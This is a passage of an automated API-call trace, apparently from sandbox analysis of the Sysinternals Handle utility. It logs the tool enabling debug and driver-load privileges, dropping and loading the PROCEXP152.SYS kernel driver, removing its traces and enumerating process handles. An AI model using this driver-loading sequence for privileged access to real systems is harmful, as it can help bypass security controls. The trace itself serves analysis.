¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0221.430] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x140010890) returned 0x0 [0221.430] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffaf70d0000 [0221.430] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="IsWow64Process") returned 0x7ffaf70ee960 [0221.430] GetCurrentProcess () returned 0xffffffffffffffff [0221.430] IsWow64Process (in: hProcess=0xffffffffffffffff, Wow64Process=0x14fef0 | out: Wow64Process=0x14fef0) returned 1 [0221.430] GetLastError () returned 0x0 [0221.431] SetLastError (dwErrCode=0x0) [0221.431] GetLastError () returned 0x0 [0221.431] SetLastError (dwErrCode=0x0) [0221.431] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Sysinternals", ulOptions=0x0, samDesired=0x101, phkResult=0x14fc10 | out: phkResult=0x14fc10*=0x0) returned 0x2 [0221.431] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Sysinternals", ulOptions=0x0, samDesired=0x101, phkResult=0x14fc10 | out: phkResult=0x14fc10*=0x0) returned 0x2 [0221.431] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Sysinternals\\Handle", ulOptions=0x0, samDesired=0x101, phkResult=0x14fc10 | out: phkResult=0x14fc10*=0x0) returned 0x2 [0221.431] GetLastError () returned 0x0 [0221.431] SetLastError (dwErrCode=0x0) [0221.431] GetLastError () returned 0x0 [0221.431] SetLastError (dwErrCode=0x0) [0221.431] RegCreateKeyW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Sysinternals\\Handle", phkResult=0x14fc38 | out: phkResult=0x14fc38*=0x164) returned 0x0 [0221.432] RegSetValueExW (in: hKey=0x164, lpValueName="EulaAccepted", Reserved=0x0, dwType=0x4, lpData=0x14fc30*=0x1, cbData=0x4 | out: lpData=0x14fc30*=0x1) returned 0x0 [0221.432] RegCloseKey (hKey=0x164) returned 0x0 [0221.432] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x0) returned 1 [0221.432] GetCurrentProcess () returned 0xffffffffffffffff [0221.432] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x14e3e0 | out: TokenHandle=0x14e3e0*=0x164) returned 1 [0221.432] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x14e3e8 | out: lpLuid=0x14e3e8*(LowPart=0x14, HighPart=0)) returned 1 [0221.437] AdjustTokenPrivileges (in: TokenHandle=0x164, DisableAllPrivileges=0, NewState=0x14e3f0*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x10, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0221.437] GetLastError () returned 0x0 [0221.437] CloseHandle (hObject=0x164) returned 1 [0221.437] GetLastError () returned 0x0 [0221.437] SetLastError (dwErrCode=0x0) [0221.437] GetLastError () returned 0x0 [0221.437] SetLastError (dwErrCode=0x0) [0221.440] CreateFileW (lpFileName="\\\\.\\PROCEXP152" (normalized: "procexp152"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0221.445] GetLastError () returned 0x2 [0221.445] SetLastError (dwErrCode=0x2) [0221.445] GetLastError () returned 0x2 [0221.445] SetLastError (dwErrCode=0x2) [0221.449] CreateFileW (lpFileName="\\\\.\\Global\\PROCEXP152" (normalized: "procexp152"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0221.466] GetSystemDirectoryW (in: lpBuffer=0x14eaa0, uSize=0x208 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0221.466] GetLastError () returned 0x2 [0221.466] SetLastError (dwErrCode=0x2) [0221.466] GetLastError () returned 0x2 [0221.466] SetLastError (dwErrCode=0x2) [0221.466] FindResourceW (hModule=0x0, lpName=0x67, lpType="BINRES") returned 0x14003d0b8 [0221.466] LoadResource (hModule=0x0, hResInfo=0x14003d0b8) returned 0x14003d420 [0221.466] SizeofResource (hModule=0x0, hResInfo=0x14003d0b8) returned 0x8618 [0221.466] LockResource (hResData=0x14003d420) returned 0x14003d420 [0221.466] GetCurrentPackageId () returned 0x3d54 [0221.466] CreateFileW (lpFileName="C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" (normalized: "c:\\windows\\system32\\drivers\\procexp152.sys"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x14e210, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0221.470] GetFileType (hFile=0x164) returned 0x1 [0221.470] WriteFile (in: hFile=0x164, lpBuffer=0x14003d420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x14c7f0, lpOverlapped=0x0 | out: lpBuffer=0x14003d420*, lpNumberOfBytesWritten=0x14c7f0*=0x8000, lpOverlapped=0x0) returned 1 [0221.472] WriteFile (in: hFile=0x164, lpBuffer=0x2fceb0*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x14c7e0, lpOverlapped=0x0 | out: lpBuffer=0x2fceb0*, lpNumberOfBytesWritten=0x14c7e0*=0x618, lpOverlapped=0x0) returned 1 [0221.472] CloseHandle (hObject=0x164) returned 1 [0221.472] GetCurrentProcess () returned 0xffffffffffffffff [0221.472] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x14d900 | out: TokenHandle=0x14d900*=0x164) returned 1 [0221.472] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeLoadDriverPrivilege", lpLuid=0x14d908 | out: lpLuid=0x14d908*(LowPart=0xa, HighPart=0)) returned 1 [0221.472] AdjustTokenPrivileges (in: TokenHandle=0x164, DisableAllPrivileges=0, NewState=0x14d910*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x10, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0221.472] GetLastError () returned 0x0 [0221.473] CloseHandle (hObject=0x164) returned 1 [0221.473] GetLastError () returned 0x0 [0221.473] SetLastError (dwErrCode=0x0) [0221.473] GetLastError () returned 0x0 [0221.473] SetLastError (dwErrCode=0x0) [0221.473] RegCreateKeyW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Services\\PROCEXP152", phkResult=0x14d988 | out: phkResult=0x14d988*=0x164) returned 0x0 [0221.473] RegSetValueExW (in: hKey=0x164, lpValueName="Type", Reserved=0x0, dwType=0x4, lpData=0x14d980*=0x1, cbData=0x4 | out: lpData=0x14d980*=0x1) returned 0x0 [0221.473] RegSetValueExW (in: hKey=0x164, lpValueName="ErrorControl", Reserved=0x0, dwType=0x4, lpData=0x14d980*=0x1, cbData=0x4 | out: lpData=0x14d980*=0x1) returned 0x0 [0221.473] RegSetValueExW (in: hKey=0x164, lpValueName="Start", Reserved=0x0, dwType=0x4, lpData=0x14d980*=0x3, cbData=0x4 | out: lpData=0x14d980*=0x3) returned 0x0 [0221.473] GetLastError () returned 0x0 [0221.473] SetLastError (dwErrCode=0x0) [0221.473] GetLastError () returned 0x0 [0221.473] SetLastError (dwErrCode=0x0) [0221.473] RegSetValueExW (in: hKey=0x164, lpValueName="ImagePath", Reserved=0x0, dwType=0x1, lpData="\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS", cbData=0x5c | out: lpData="\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS") returned 0x0 [0221.473] RegCloseKey (hKey=0x164) returned 0x0 [0221.474] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x7ffaf7a10000 [0221.474] GetProcAddress (hModule=0x7ffaf7a10000, lpProcName="NtLoadDriver") returned 0x7ffaf7aa4490 [0221.474] GetLastError () returned 0x0 [0221.474] SetLastError (dwErrCode=0x0) [0221.474] GetLastError () returned 0x0 [0221.474] SetLastError (dwErrCode=0x0) [0221.474] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x7ffaf7a10000 [0221.474] GetProcAddress (hModule=0x7ffaf7a10000, lpProcName="RtlInitUnicodeString") returned 0x7ffaf7a2f0d0 [0221.474] RtlInitUnicodeString (in: DestinationString=0x14d990, SourceString="\\Registry\\Machine\\System\\CurrentControlSet\\Services\\PROCEXP152" | out: DestinationString="\\Registry\\Machine\\System\\CurrentControlSet\\Services\\PROCEXP152") [0221.474] NtLoadDriver (DriverServiceName="\\Registry\\Machine\\System\\CurrentControlSet\\Services\\PROCEXP152") returned 0x0 [0229.856] GetLastError () returned 0x0 [0229.856] SetLastError (dwErrCode=0x0) [0229.856] GetLastError () returned 0x0 [0229.856] SetLastError (dwErrCode=0x0) [0229.856] RegDeleteKeyW (hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Services\\PROCEXP152\\Enum") returned 0x2 [0229.856] GetLastError () returned 0x0 [0229.856] SetLastError (dwErrCode=0x0) [0229.856] GetLastError () returned 0x0 [0229.856] SetLastError (dwErrCode=0x0) [0229.856] RegDeleteKeyW (hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Services\\PROCEXP152\\Security") returned 0x2 [0229.856] RegDeleteKeyW (hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Services\\PROCEXP152") returned 0x0 [0229.856] GetLastError () returned 0x0 [0229.856] SetLastError (dwErrCode=0x0) [0229.856] GetLastError () returned 0x0 [0229.856] SetLastError (dwErrCode=0x0) [0229.861] CreateFileW (lpFileName="\\\\.\\PROCEXP152" (normalized: "procexp152"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0229.861] SeCaptureSubjectContext (in: SubjectContext=0xffffd000b1b8e328 | out: SubjectContext=0xffffd000b1b8e328) [0229.861] ExGetPreviousMode () returned 0x1 [0229.861] SePrivilegeCheck (in: RequiredPrivileges=0xffffd000b1b8e348, SubjectSecurityContext=0xffffd000b1b8e328, AccessMode=0x1 | out: RequiredPrivileges=0xffffd000b1b8e348) returned 1 [0229.861] SeReleaseSubjectContext (in: SubjectContext=0xffffd000b1b8e328 | out: SubjectContext=0xffffd000b1b8e328) [0229.861] IoCompleteRequest () returned 0x884 [0229.861] DeleteFileW (lpFileName="C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" (normalized: "c:\\windows\\system32\\drivers\\procexp152.sys")) returned 0 [0229.862] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x7ffaf7a10000 [0229.862] GetProcAddress (hModule=0x7ffaf7a10000, lpProcName="NtQueryInformationProcess") returned 0x7ffaf7aa36d0 [0229.862] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x7ffaf7a10000 [0229.862] GetProcAddress (hModule=0x7ffaf7a10000, lpProcName="NtQueryInformationThread") returned 0x7ffaf7aa3790 [0229.862] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x7ffaf7a10000 [0229.862] GetProcAddress (hModule=0x7ffaf7a10000, lpProcName="NtQuerySystemInformation") returned 0x7ffaf7aa38a0 [0229.863] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x7ffaf7a10000 [0229.863] GetProcAddress (hModule=0x7ffaf7a10000, lpProcName="NtQuerySymbolicLinkObject") returned 0x7ffaf7aa4980 [0229.863] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x7ffaf7a10000 [0229.863] GetProcAddress (hModule=0x7ffaf7a10000, lpProcName="NtQueryDirectoryObject") returned 0x7ffaf7aa47f0 [0229.863] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x7ffaf7a10000 [0229.863] GetProcAddress (hModule=0x7ffaf7a10000, lpProcName="NtOpenSymbolicLinkObject") returned 0x7ffaf7aa46c0 [0229.863] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x7ffaf7a10000 [0229.863] GetProcAddress (hModule=0x7ffaf7a10000, lpProcName="NtOpenDirectoryObject") returned 0x7ffaf7aa3ac0 [0229.863] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x7ffaf7a10000 [0229.863] GetProcAddress (hModule=0x7ffaf7a10000, lpProcName="NtQueryObject") returned 0x7ffaf7aa3640 [0229.863] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x7ffaf7a10000 [0229.863] GetProcAddress (hModule=0x7ffaf7a10000, lpProcName="NtQuerySection") returned 0x7ffaf7aa3a50 [0229.863] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x7ffaf7a10000 [0229.864] GetProcAddress (hModule=0x7ffaf7a10000, lpProcName="RtlInitAnsiString") returned 0x7ffaf7a75d30 [0229.864] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x7ffaf7a10000 [0229.864] GetProcAddress (hModule=0x7ffaf7a10000, lpProcName="RtlInitUnicodeString") returned 0x7ffaf7a2f0d0 [0229.864] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x7ffaf7a10000 [0229.864] GetProcAddress (hModule=0x7ffaf7a10000, lpProcName="RtlAnsiStringToUnicodeString") returned 0x7ffaf7a336a0 [0229.864] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x7ffaf7a10000 [0229.864] GetProcAddress (hModule=0x7ffaf7a10000, lpProcName="RtlFreeUnicodeString") returned 0x7ffaf7a37110 [0229.864] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x7ffaf7a10000 [0229.864] GetProcAddress (hModule=0x7ffaf7a10000, lpProcName="RtlFreeAnsiString") returned 0x7ffaf7a37110 [0229.864] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x7ffaf7a10000 [0229.864] GetProcAddress (hModule=0x7ffaf7a10000, lpProcName="RtlUnicodeStringToAnsiString") returned 0x7ffaf7a33dc0 [0229.864] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x0, Length=0x0, ResultLength=0x0 | out: SystemInformation=0x0, ResultLength=0x0) returned 0xc0000004 [0229.864] GetLastError () returned 0x5 [0229.864] SetLastError (dwErrCode=0x5) [0229.864] GetLastError () returned 0x5 [0229.865] SetLastError (dwErrCode=0x5) [0229.865] GetDriveTypeW (lpRootPathName="A:\\") returned 0x1 [0229.865] GetLastError () returned 0x5 [0229.865] SetLastError (dwErrCode=0x5) [0229.865] GetLastError () returned 0x5 [0229.865] SetLastError (dwErrCode=0x5) [0229.865] GetDriveTypeW (lpRootPathName="B:\\") returned 0x1 [0229.865] GetLastError () returned 0x5 [0229.865] SetLastError (dwErrCode=0x5) [0229.865] GetLastError () returned 0x5 [0229.865] SetLastError (dwErrCode=0x5) [0229.865] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0229.865] GetLastError () returned 0x5 [0229.865] SetLastError (dwErrCode=0x5) [0229.865] GetLastError () returned 0x5 [0229.865] SetLastError (dwErrCode=0x5) [0229.865] RtlInitUnicodeString (in: DestinationString=0x14dac0, SourceString="\\DosDevices\\C:" | out: DestinationString="\\DosDevices\\C:") [0229.865] NtOpenSymbolicLinkObject (in: SymbolicLinkHandle=0x14db00, DesiredAccess=0x20001, ObjectAttributes=0x14db10 | out: SymbolicLinkHandle=0x14db00*=0x19c) returned 0x0 [0229.865] NtQuerySymbolicLinkObject (in: SymLinkObjHandle=0x19c, LinkTarget=0x14dbe0, DataWritten=0x14db08 | out: LinkTarget="\\Device\\HarddiskVolume1", DataWritten=0x14db08) returned 0x0 [0229.865] CloseHandle (hObject=0x19c) returned 1 [0229.865] RtlInitUnicodeString (in: DestinationString=0x14dac0, SourceString="\\Device\\HarddiskVolume1" | out: DestinationString="\\Device\\HarddiskVolume1") [0229.865] NtOpenSymbolicLinkObject (in: SymbolicLinkHandle=0x14db00, DesiredAccess=0x20001, ObjectAttributes=0x14db10 | out: SymbolicLinkHandle=0x14db00*=0x0) returned 0xc0000024 [0229.866] GetLastError () returned 0x5 [0229.866] SetLastError (dwErrCode=0x5) [0229.866] GetLastError () returned 0x5 [0229.866] SetLastError (dwErrCode=0x5) [0229.866] GetDriveTypeW (lpRootPathName="D:\\") returned 0x1 [0229.866] GetLastError () returned 0x5 [0229.866] SetLastError (dwErrCode=0x5) [0229.866] GetLastError () returned 0x5 [0229.866] SetLastError (dwErrCode=0x5) [0229.866] GetDriveTypeW (lpRootPathName="E:\\") returned 0x1 [0229.866] GetLastError () returned 0x5 [0229.866] SetLastError (dwErrCode=0x5) [0229.866] GetLastError () returned 0x5 [0229.866] SetLastError (dwErrCode=0x5) [0229.866] GetDriveTypeW (lpRootPathName="F:\\") returned 0x1 [0229.866] GetLastError () returned 0x5 [0229.866] SetLastError (dwErrCode=0x5) [0229.866] GetLastError () returned 0x5 [0229.866] SetLastError (dwErrCode=0x5) [0229.866] GetDriveTypeW (lpRootPathName="G:\\") returned 0x1 [0229.866] GetLastError () returned 0x5 [0229.866] SetLastError (dwErrCode=0x5) [0229.867] GetLastError () returned 0x5 [0229.867] SetLastError (dwErrCode=0x5) [0229.867] GetDriveTypeW (lpRootPathName="H:\\") returned 0x1 [0229.867] GetLastError () returned 0x5 [0229.867] SetLastError (dwErrCode=0x5) [0229.867] GetLastError () returned 0x5 [0229.867] SetLastError (dwErrCode=0x5) [0229.867] GetDriveTypeW (lpRootPathName="I:\\") returned 0x1 [0229.867] GetLastError () returned 0x5 [0229.867] SetLastError (dwErrCode=0x5) [0229.867] GetLastError () returned 0x5 [0229.867] SetLastError (dwErrCode=0x5) [0229.867] GetDriveTypeW (lpRootPathName="J:\\") returned 0x1 [0229.867] GetLastError () returned 0x5 [0229.867] SetLastError (dwErrCode=0x5) [0229.867] GetLastError () returned 0x5 [0229.867] SetLastError (dwErrCode=0x5) [0229.867] GetDriveTypeW (lpRootPathName="K:\\") returned 0x1 [0229.867] GetLastError () returned 0x5 [0229.867] SetLastError (dwErrCode=0x5) [0229.867] GetLastError () returned 0x5 [0229.867] SetLastError (dwErrCode=0x5) [0229.867] GetDriveTypeW (lpRootPathName="L:\\") returned 0x1 [0229.868] GetLastError () returned 0x5 [0229.868] SetLastError (dwErrCode=0x5) [0229.868] GetLastError () returned 0x5 [0229.868] SetLastError (dwErrCode=0x5) [0229.868] GetDriveTypeW (lpRootPathName="M:\\") returned 0x1 [0229.868] GetLastError () returned 0x5 [0229.868] SetLastError (dwErrCode=0x5) [0229.868] GetLastError () returned 0x5 [0229.868] SetLastError (dwErrCode=0x5) [0229.868] GetDriveTypeW (lpRootPathName="N:\\") returned 0x1 [0229.868] GetLastError () returned 0x5 [0229.868] SetLastError (dwErrCode=0x5) [0229.868] GetLastError () returned 0x5 [0229.868] SetLastError (dwErrCode=0x5) [0229.868] GetDriveTypeW (lpRootPathName="O:\\") returned 0x1 [0229.868] GetLastError () returned 0x5 [0229.868] SetLastError (dwErrCode=0x5) [0229.868] GetLastError () returned 0x5 [0229.868] SetLastError (dwErrCode=0x5) [0229.868] GetDriveTypeW (lpRootPathName="P:\\") returned 0x1 [0229.868] GetLastError () returned 0x5 [0229.869] SetLastError (dwErrCode=0x5) [0229.869] GetLastError () returned 0x5 [0229.869] SetLastError (dwErrCode=0x5) [0229.869] GetDriveTypeW (lpRootPathName="Q:\\") returned 0x1 [0229.869] GetLastError () returned 0x5 [0229.869] SetLastError (dwErrCode=0x5) [0229.869] GetLastError () returned 0x5 [0229.869] SetLastError (dwErrCode=0x5) [0229.869] GetDriveTypeW (lpRootPathName="R:\\") returned 0x1 [0229.869] GetLastError () returned 0x5 [0229.869] SetLastError (dwErrCode=0x5) [0229.869] GetLastError () returned 0x5 [0229.869] SetLastError (dwErrCode=0x5) [0229.869] GetDriveTypeW (lpRootPathName="S:\\") returned 0x1 [0229.869] GetLastError () returned 0x5 [0229.869] SetLastError (dwErrCode=0x5) [0229.869] GetLastError () returned 0x5 [0229.869] SetLastError (dwErrCode=0x5) [0229.869] GetDriveTypeW (lpRootPathName="T:\\") returned 0x1 [0229.869] GetLastError () returned 0x5 [0229.869] SetLastError (dwErrCode=0x5) [0229.869] GetLastError () returned 0x5 [0229.870] SetLastError (dwErrCode=0x5) [0229.870] GetDriveTypeW (lpRootPathName="U:\\") returned 0x1 [0229.870] GetLastError () returned 0x5 [0229.870] SetLastError (dwErrCode=0x5) [0229.870] GetLastError () returned 0x5 [0229.870] SetLastError (dwErrCode=0x5) [0229.870] GetDriveTypeW (lpRootPathName="V:\\") returned 0x1 [0229.870] GetLastError () returned 0x5 [0229.870] SetLastError (dwErrCode=0x5) [0229.870] GetLastError () returned 0x5 [0229.870] SetLastError (dwErrCode=0x5) [0229.870] GetDriveTypeW (lpRootPathName="W:\\") returned 0x1 [0229.870] GetLastError () returned 0x5 [0229.870] SetLastError (dwErrCode=0x5) [0229.870] GetLastError () returned 0x5 [0229.870] SetLastError (dwErrCode=0x5) [0229.870] GetDriveTypeW (lpRootPathName="X:\\") returned 0x1 [0229.870] GetLastError () returned 0x5 [0229.870] SetLastError (dwErrCode=0x5) [0229.870] GetLastError () returned 0x5 [0229.870] SetLastError (dwErrCode=0x5) [0229.870] GetDriveTypeW (lpRootPathName="Y:\\") returned 0x1 [0229.871] GetLastError () returned 0x5 [0229.871] SetLastError (dwErrCode=0x5) [0229.871] GetLastError () returned 0x5 [0229.871] SetLastError (dwErrCode=0x5) [0229.871] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x1 [0229.871] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x2fceb0, Length=0x4000, ResultLength=0x14e420 | out: SystemInformation=0x2fceb0, ResultLength=0x14e420*=0xa97f0) returned 0xc0000004 [0229.873] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x2fceb0, Length=0x8000, ResultLength=0x14e420 | out: SystemInformation=0x2fceb0, ResultLength=0x14e420*=0xa97f0) returned 0xc0000004 [0229.874] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x2fceb0, Length=0x10000, ResultLength=0x14e420 | out: SystemInformation=0x2fceb0, ResultLength=0x14e420*=0xa97f0) returned 0xc0000004 [0229.876] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x2fceb0, Length=0x20000, ResultLength=0x14e420 | out: SystemInformation=0x2fceb0, ResultLength=0x14e420*=0xa97f0) returned 0xc0000004 [0229.879] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x2fceb0, Length=0x40000, ResultLength=0x14e420 | out: SystemInformation=0x2fceb0, ResultLength=0x14e420*=0xa97f0) returned 0xc0000004 [0229.885] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x2fceb0, Length=0x80000, ResultLength=0x14e420 | out: SystemInformation=0x2fceb0, ResultLength=0x14e420*=0xa9480) returned 0xc0000004 [0252.752] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x1d0f040, Length=0x100000, ResultLength=0x14e420 | out: SystemInformation=0x1d0f040, ResultLength=0x14e420*=0xa9480) returned 0x0 [0252.762] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2fceb0, Length=0x4000, ResultLength=0x14e420 | out: SystemInformation=0x2fceb0, ResultLength=0x14e420*=0x168d0) returned 0xc0000004 [0252.763] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2fceb0, Length=0x8000, ResultLength=0x14e420 | out: SystemInformation=0x2fceb0, ResultLength=0x14e420*=0x168d0) returned 0xc0000004 [0252.763] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2fceb0, Length=0xc000, ResultLength=0x14e420 | out: SystemInformation=0x2fceb0, ResultLength=0x14e420*=0x168d0) returned 0xc0000004 [0252.763] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2fceb0, Length=0x10000, ResultLength=0x14e420 | out: SystemInformation=0x2fceb0, ResultLength=0x14e420*=0x168d0) returned 0xc0000004 [0252.763] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2fceb0, Length=0x14000, ResultLength=0x14e420 | out: SystemInformation=0x2fceb0, ResultLength=0x14e420*=0x168d0) returned 0xc0000004 [0252.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2fceb0, Length=0x18000, ResultLength=0x14e420 | out: SystemInformation=0x2fceb0, ResultLength=0x14e420*=0x168d0) returned 0x0 [0252.764] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0xed4) returned 0x19c [0252.764] GetCurrentProcess () returned 0xffffffffffffffff [0252.764] DuplicateHandle (in: hSourceProcessHandle=0x19c, hSourceHandle=0xc0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x1a0) returned 1 [0252.764] CloseHandle (hObject=0x19c) returned 1 [0252.764] NtQueryObject (in: Handle=0x1a0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0252.764] NtQueryObject (in: Handle=0x1a0, ObjectInformationClass=0x2, ObjectInformation=0x2ed480, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x2ed480, ReturnLength=0x0) returned 0x0 [0252.764] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314ec0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x314ec0*, lpBytesReturned=0x14d450*=0x2c, lpOverlapped=0x0) returned 1 [0252.764] PsLookupProcessByProcessId (in: ProcessId=0xed4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0252.764] PsAcquireProcessExitSynchronization () returned 0x0 [0252.764] KeStackAttachProcess (in: PROCESS=0xffffe0006845c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006845c080, ApcState=0xffffd000b1b8e400) [0252.764] ObReferenceObjectByHandle (in: Handle=0xc0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a261d00, HandleInformation=0x0) returned 0x0 [0252.764] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0252.764] PsReleaseProcessExitSynchronization () returned 0x2 [0252.764] ObfDereferenceObject (Object=0xffffe0006845c080) returned 0x17ff1 [0252.764] ObQueryNameString (in: Object=0xffffe000756919d0, ObjectNameInfo=0xffffe000685023c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe000685023c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0252.764] ObfDereferenceObject (Object=0xffffe0006a261d00) returned 0x17ffd [0252.764] IoCompleteRequest () returned 0x0 [0252.764] CloseHandle (hObject=0x1a0) returned 1 [0252.764] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x190) returned 0x1a0 [0252.764] GetCurrentProcess () returned 0xffffffffffffffff [0252.765] DuplicateHandle (in: hSourceProcessHandle=0x1a0, hSourceHandle=0xb8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x19c) returned 1 [0252.765] CloseHandle (hObject=0x1a0) returned 1 [0252.765] NtQueryObject (in: Handle=0x19c, ObjectInformationClass=0x2, 